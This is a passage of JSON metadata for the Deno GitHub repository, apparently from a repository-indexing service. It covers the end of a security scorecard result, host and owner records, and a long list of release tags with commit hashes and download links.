declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/